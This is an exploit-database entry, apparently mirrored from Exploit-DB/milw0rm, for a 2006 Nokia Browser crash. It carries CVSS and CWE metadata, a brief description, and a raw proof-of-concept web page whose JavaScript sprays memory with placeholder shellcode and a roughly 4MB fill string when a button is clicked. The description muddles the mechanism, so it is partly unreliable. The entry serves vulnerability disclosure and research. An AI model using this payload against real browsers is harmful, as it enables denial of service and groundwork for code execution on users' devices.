header-logo
Suggest Exploit
vendor:
Browser
by:
Qode
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Browser
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Nokia Browser Crash by Qode

This vulnerability allows remote attackers to cause a denial of service (crash) in Nokia Browser. The vulnerability is caused due to a boundary error in the handling of shellcode. This can be exploited to cause a stack-based buffer overflow via an overly long string passed to the unescape() function. Successful exploitation allows execution of arbitrary code.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

<!--

Nokia Browser Crash by Qode

http://www.qode.org

-->

<html><body><script>

function crash()

               {

               alert('Nokia Browser Crash by Qode');

               shellcode = unescape('%ucccc');

               fill = unescape('%ucccc');

               addr = 0x02020202;

               var b = fill;

               while (b.length <= 0x400000) b+=b;

               }

</script>

Nokia Browser Crash by Qode<br>

<input type='button' onClick='crash()' value='Crash'>

</body></html>

# milw0rm.com [2006-08-13]

Navigation

Suggest Exploit

Services By CQR